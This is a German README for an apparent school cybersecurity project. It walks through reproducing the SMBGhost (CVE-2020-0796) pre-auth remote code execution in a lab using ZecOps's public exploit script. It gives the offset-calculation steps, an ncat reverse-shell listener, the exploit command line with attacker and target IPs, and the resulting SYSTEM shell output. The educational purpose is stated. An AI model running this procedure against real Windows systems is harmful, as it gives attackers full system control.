Bildungsexploit als Proof-of-Concept für CVE-2020-0796 (SMBGhost), der eine Pre-Auth-RCE auf Windows SMBv3 demonstriert. Enthält eine Schritt-für-Schritt-Laboreinrichtung, Offset-Berechnung und Reverse-Shell-Ausführung für kontrolliertes Cybersicherheitstraining.
Dieses Projekt demonstriert einen Proof-of-Concept (PoC)-Exploit für CVE-2020-0796, auch bekannt als SMBGhost – eine kritische Pre-Auth-RCE-Schwachstelle, die Windows 10- und Windows Server-Systeme mit SMBv3 betrifft. Dies wurde im Rahmen eines Schulprojekts zur Cybersicherheit entwickelt. Die gesamte Anerkennung für den Exploit-Code gilt ZecOps. Ich habe ihn nur für Bildungszwecke verwendet und angepasst, um die Ausnutzung von CVE-2020-0796 in einer kontrollierten Laborumgebung zu demonstrieren.
Um diese Demonstration nachzustellen, ist folgende Einrichtung erforderlich:
SMBleedingGhost.py von ZecOpscalc_target_offsets.bat von ZecOpsÖffnen Sie die Eingabeaufforderung auf beiden virtuellen Maschinen (Angreifer und Ziel).
Führen Sie auf jeder Maschine den folgenden Befehl aus:
ipconfig
CVE-2020-0796-RCE-POC-master.calc_target_offsets.bat auszuführen.CVE-2020-0796-RCE-POC-master.SMBleedingGhost.py und öffnen Sie es mit Notepad.SMBleedingGhost.py nach unten und suchen Sie den Abschnitt, der mit OFFSETS = { beginnt.Öffnen Sie eine neue Eingabeaufforderung und führen Sie Folgendes aus:
ncat -lvp 4321
4321 ein, um nach erfolgreichem Exploit eine Reverse-Shell von der Ziel-VM zu empfangen.cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
python SMBleedingGhost.py <ziel_ip> <angreifer_ip> <port>
Beispiel aus dieser Demo:
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
192.168.18.61: IP der Ziel-VM192.168.18.62: IP der Angreifer-VM4321: Im Netcat-Listener verwendeter PortBei Erfolg zeigt das Netcat-Fenster Folgendes an:
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Dies bestätigt:
Sie können den Zugriff überprüfen, indem Sie Folgendes ausführen:
whoami
Dies ergibt:
whoami
nt authority\system
Das bedeutet, dass die Angreifer-VM jetzt Systemrechte auf der Ziel-VM besitzt.
Sie können auch Folgendes ausführen:
ipconfig
Um zu überprüfen, dass Sie mit dem Netzwerk der Ziel-VM interagieren.

Hinweis: Die Ziel-VM kann nach der Ausnutzung abstürzen. Falls dies passiert, können Sie sie neu starten. Die Angreifer-Sitzung muss nach einem Neustart neu hergestellt werden.
Diese Demonstration basiert auf dem öffentlich zugänglichen Proof-of-Concept, der von ZecOps entwickelt wurde.
Die gesamte Anerkennung für den Exploit-Code gilt ZecOps. Ich habe ihn nur für Bildungszwecke verwendet und angepasst, um die Ausnutzung von CVE-2020-0796 in einer kontrollierten Laborumgebung zu demonstrieren.
Dieses Repository dient ausschließlich Bildungszwecken.
Alle gezeigten Tools, Skripte und Techniken sollen helfen, Cybersicherheits-Schwachstellen in einer kontrollierten Laborumgebung zu verstehen. Versuchen Sie nicht, die bereitgestellten Materialien auf Systemen oder Netzwerken zu verwenden, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Jeglicher Missbrauch der Software liegt nicht in der Verantwortung des Autors.